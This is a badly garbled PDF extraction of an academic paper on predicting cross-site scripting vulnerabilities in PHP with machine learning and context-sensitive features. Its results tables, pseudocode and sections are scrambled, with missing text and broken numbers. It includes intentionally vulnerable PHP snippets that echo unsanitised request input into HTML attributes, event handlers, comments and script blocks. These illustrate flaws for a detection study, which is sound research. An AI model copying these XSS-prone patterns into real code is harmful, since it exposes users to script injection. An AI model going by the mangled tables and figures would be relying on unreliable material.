Académique Documents
Professionnel Documents
Culture Documents
Keywordsweb application security, cross-site scripting vulnerability, machine learning, context-sensitive, input validation
I.
I NTRODUCTION
162
II.
In this section, we describe cross-site scripting vulnerabilities, and discuss the limitations of existing related approaches,
which motivates us for this work.
A. Cross-Site Scripting Vulnerabilities
Cross-site scripting (XSS) is an application-level codeinjection type security vulnerability. It occurs whenever a
server program (i.e. dynamic web page) uses unrestricted
input via HTTP request, database, or files in its response
without any validation. It allows a malicious user to steal
sensitive information (i.e. cookie, session) and performs other
malevolent operations. The figure 1 illustrates the sequence
of given below steps to perform stored XSS attack. Initially,
the malicious-user uses a blog site comment-form to inserts
and stores the malicious scripts into site database. Then, the
legitimate-user sends an HTTP request to site for viewing the
latest comments. The site returns the stored comments along
with the scripts in its response. Finally, the legitimate user
browser executes the scripts and sends legitimate-user sensitive
information to an attacker server.
Fig. 1.
163
1.<html>
2.<body>
3. <?php
accept and store user input in a variable
4.$user_input= $_GET['UserData'];
use of user input in HTML tag attribute name
5.echo "<div ". $user_input ."= bob />";
use of user input in HTML tag name
6. echo "<". $user_input." href= \"/bob\" />";
use of user input in HTML tag body section
7.echo $ user_input;
use of user input in double quoted attribute value
8.echo "<div id=\"".$user_input."\">text</div>";
use of user input in no quoted attribute value
9.echo "<div id=".$ user_input.">content</div>";
10.echo "<a href ='". $ user_input."'>click</a>";
use of user input in single quoted event handler
11.echo"<div onmouseover=\"x='". $user_input."\"\>";
use of user input to change text color dynamically
12.echo "<span style=color:".
htmlspecialchars ($user_input).">welcome</span>"";
presence of user input in HTML comment block
13.<! -- <?php echo $ user_input; ?> -->
use of user input in script block
14.<script>
<?php $ user_input = $_POST ['UserData'] ;
$ user_input=intval($tainted); echo $user_input;?>
</script>
15. ?>
16. </body> </html>
fails to prevent XSS attack in such scenario. Similarly, userinput referenced in the comment block, Javascript block and
body_anchor_NQ_Attr_Val context in statements 13, 11, 10
respectively requires special context-sensitive filters to avoid
XSS vulnerabilities. In paper [8], the authors used pattern
matching technique to identify HTML context and ESAPI
escaping library to mitigate XSS vulnerabilities in Java-based
web applications. Saxena et. al (2011) [9] pointed out
that context-mismatched sanitization and inconsistent multiple
sanitization issues require essential modification in approach
to detect XSS vulnerabilities. Alternatively, in paper [7],
the authors have revealed that text-mining based machine
learning models provide probabilities remarks of vulnerable
source code segments. It helps to save the time and efforts of
developer by concentrating on the code segment predicted to
vulnerable.
III.
R ELATED WORK
TABLE I.
Authors
Features
Applications
Source code
language &
Identified
vulnerabilities
Machine-learning
Algorithms
Performance
Shin et al.
(2011) [3]
code complexity,
code churn,
and developer
activity metrics
Mozilla Firefox
Web Browser,
Red Hat Enterprise
Linux kernel
C++ /
General vulnerabilities
Logistic regression,
J48, Random forest,
NB, Bayesian network
Recall: 80 %
Chowdhury et al.
(2011) [4]
code complexity,
coupling and
cohesion metrics
Mozilla Firefox
Web Browser
C++ /
General vulnerabilities
Logistic regression,
C4.5, Random forest,
NB
Logistic regression,
MLP
Shar el
(2013)
Shar et
(2013)
al.
[6]
al.
[10]
PHP
Web Applications
PHP
Web Applications
Precision: 4%
Recall: 74%
Accuracy: 73%
F1 measure: 73%
Recall: >78%
Pf: <6%
Recall : 86%
Pf: 3%.
Accuracy : 87%,
Precision : 85%
Recall : 88%
Hovsepyan et al.
(2012) [11]
unique word
K9 mail
client application
SVM
Roccardo et al.
(2014) [7]
Unique-words &
Uni_tokens
Java Application
& Drupal CMS
Decision Trees,
k-Nearest Neighbour,
NB, Random Forest
and SVM
Recall: 82 %.
Walden et al.
(2014) [5]
PHP-MyAdmin,
Moodle,
and Drupal CMS
Random Forest
Recall: 80.5%
Accuracy: 75.4%
IV.
The proposed approach proceeds as follows. First, we extract user-input context features in the output-statement. Then,
we extract basic features that represent the characteristics of
input, output and, validation and sanitization routines through
PHP tokenizing process. Further, we construct a feature set
by combining basic and context features. Finally, we use various machine-learning algorithms to build various prediction
models. Figure 3 depicts the steps, which are followed in the
164
165
Input: A String S that contains HTML code and Block Context TypeB
Output: Context of user-input in output-statement
TypeS=A variable representing user-input context
if ( Is complete HTML tag present in source string S ?) then
return TypeB;
else if (Is String S start with < && end with= | = | =) then
. %comment: BLOCK 1 %
if (Is just after < any special tag (i.e a |style|script) is in string S)
then
if ( Is any event handler (i.e. onload) present in string S) then
T ypeS = T ypeB +Event_Attr_V alue+[DQ|SQ|N Q];
return TypeS;
ELSE
T ypeS = T ypeB +ST ag_Attr_V alue+ (DQ|SQ|N Q);
return TypeS;
end if
ELSE
. %comment: if special tag is not present just after the opening tag %
if (Is any event handler (i.e. onload) present in string S) then
TypeS
=T ypeB
+
T ag_Event_Attr_V al
+
(DQ|SQ|N Q);
return TypeS;
else if ( Is any style in string S) then
T ypeS
=
T ypeB + T ag_CSS_Attr_V al +
(DQ|SQ|N Q);
return TypeS;
end if
end if
else if (IsStringS == < N on_special_tag ) then
. %comment: BLOCK 2 %
T ypeS = T ypeB + Attr_N ame;
return TypeS;
else if (IsStringS == < ) then
. %comment: BLOCK 3 %
T ypeS = T ypeB + T ag_N ame;
return TypeS;
Else
return TypeB;
end if
B. Example
The features extracted through proposed feature extraction
approach can be explained as follows. Consider the source
code statements given below in figure 4. In this code statements
3-6, 9-11, 16-18 are present in HTML Element, Comment
and Script block respectively. The proposed approach extracts
HTML_ELEMENT, Comment, and Script block-context and
then tokenize each block code statement to build feature set.
The extracted features corresponding to the given source code
are presented in table II. The text mining based prediction
approach [7] tokenizes the source code and consider PHP
tokens as a feature. In this approach, the user-defined variable
names are considered as a different feature that are not useful
from vulnerability point of view. Also, T_STRING feature
is considered for all strings (e.g. ENT_QUOTES, htmlspecialchars etc) in their feature set. However, ENT_QUOTES
is a parameter and htmlspecialchars is sanitisation function
in PHP language, but both are considered in the same category.
1. <html> <body>
2. <?php
3. $data=$_GET['Data'];
4. echo $data ;
5. echo "<div id=\"". $data ."\">content</div>" ;
6. echo "<div onmouseover=\"x='". $data."\"\>";?>
7. <!-8. <?php
9. $data = $_GET['Data'];
10. $data = intval($data);
11. echo $data ;
12. ?>
13. -->
14. <script>
15. <?php
16. $data = $_GET['Data'];
17. $data = intval($data);
18. echo $data ;
19. ?>
20. </script>
21. </body> </html>
Fig. 4.
XSS Vulnerable Source Code Statements that require ContextSensitive Sanitization
TABLE II.
Code Line
1
2
T_VARIABLE_HTML_Element
$_GET_HTML_Element
T_ECHO_HTML_Element,
T_VARIABLE_HTML_Element
T_ECHO_HTML_Element,
HTML_Element_
H_TAG_DQ_Attr_Val,
T_VARIABLE_HTML_Element
T_ECHO_HTML_Element,
HTML_Element_
HTAG_Event_DQ_Attr_Val,
T_VARIABLE_HTML_Element
3
4
6
7
8
T_VARIABLE_comment_block,
$_GET_comment_block
T_VARIABLE_comment_block,
$_GET_comment_block,
T_VARIABLE_comment_block
T_ECHO_comment_block ,
T_VARIABLE_comment_block
9
10
11
12
13
14
15
T_ECHO, .,
T_VARIABLE($data), . , ;
T_INLINE_HTML
T_OPEN_TAG
T_VARIABLE($data), = ,
T_VARIABLE($_GET), [, ] ;,
T_VARIABLE($data), =,
T_STRING,
(,T_VARIABLE($data),), ;
T_ECHO, T_VARIABLE($data)
T_CLOSE_TAG
T_INLINE_HTML
T_VARIABLE_script_block,
$_GET_script_block
T_VARIABLE_script_block,
intval_script_block,
T_VARIABLE_script_block
T_VARIABLE_script_block,
T_VARIABLE_script_block
16
17
18
19
20
VI.
T_OPEN_TAG
T_VARIABLE($data), = ,
T_VARIABLE($_GET), [, ] ;,
T_VARIABLE($data), =,
T_STRING,(,
T_VARIABLE($data),), ;
T_ECHO,
T_VARIABLE($data), ;
T_CLOSE_TAG
T_INLINE_HTML
A. Experimental Setting:
The 10-fold cross validation technique is used to evaluate
the performance of the proposed approach. We randomly
divide the dataset into 90% training and 10% testing programs, such that both the sets are disjoint. We repeat all
the experiments 10 times with randomly selected training and
testing sets, and final performance is reported by average of
the results.
3808 unsafe samples that are organized into different categories. Evaluation of the proposed methods are performed on
this dataset, as it provides mostly all the cases required for XSS
vulnerability prediction. This dataset is available for free, opensource and contain a set of PHP source code with their vulnerability labels. It also contains the cases for object oriented
source code that can be helpful to evaluate the performance of
the proposed methods for object-oriented code. This dataset is
better as compared to other existing datasets to evaluate the
proposed approaches. The other existing vulnerability dataset
repositories are Bugzilla, CVE , NVD etc. These contain only
vulnerability information and do not provide source code to
extract vulnerability prediction features. Therefore, these are
inadequate to evaluate our proposed approach. Next, NIST
(National Institute of Standard and Technology) dataset is also
available publicly to evaluate vulnerability prediction methods,
but it contains only limited samples for PHP source code (i.e.
80) which is insufficient to build an efficient machine learning
model.
166
TABLE III.
E VALUATION
Approaches
F1 (Walden Features)
F2 (Proposed
Approach)
Evaluation
Measure
Precision
Recall
F1-measure
Accuracy
VULNERABILITY PREDICTION
SVM
NB
Bagging
66.2
57.6
61.6
70.9
59.6
39.4
47.5
64.7
67.1
56.9
61.6
71.3
Random
Forest
64.7
53.7
58.7
69.4
Precision
88.7
67.8
93.4
Recall
F1-measure
Accuracy
83.2
85.9
88.9
47
55.5
69.5
88
90.6
92.6
XSS
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
ACKNOWLEDGEMENT
We thank James Walden, Associate Professor and Director
of the Center for Information Security, Northern Kentucky
University for providing valuable insights and helpful suggestions on our paper. We also thanks management of Swami
Keshvanand Institute of Technology, Management Gramothan,
Jaipur, Rajasthan, India for most support and encouragement.
[14]
[15]
[16]
R EFERENCES
[1]
WhiteHatSecurity.
Web
statistics
report.
https://whitehatsec.com/categories/statistics-report, 2013.
Accessed:
2013-06-26.
[2] Isatou Hydara, Abu Bakar Md. Sultan, Hazura Zulzalil, and Novia
Admodisastro. Current state of research on cross-site scripting a
systematic literature review. Information and Software Technology,
58(0):170 186, 2015.
[3] Yonghee Shin, A. Meneely, L. Williams, and J.A. Osborne. Evaluating
complexity, code churn, and developer activity metrics as indicators of
software vulnerabilities. IEEE Transactions on Software Engineering,
37(6):772787, Nov 2011.
167
J48
JRip
67.8
56.8
61.8
71.6
65.6
53
58.6
69.7
86.9
92.9
99.2
81.6
84.2
87.6
86.9
89.8
92
60
74.8
83.6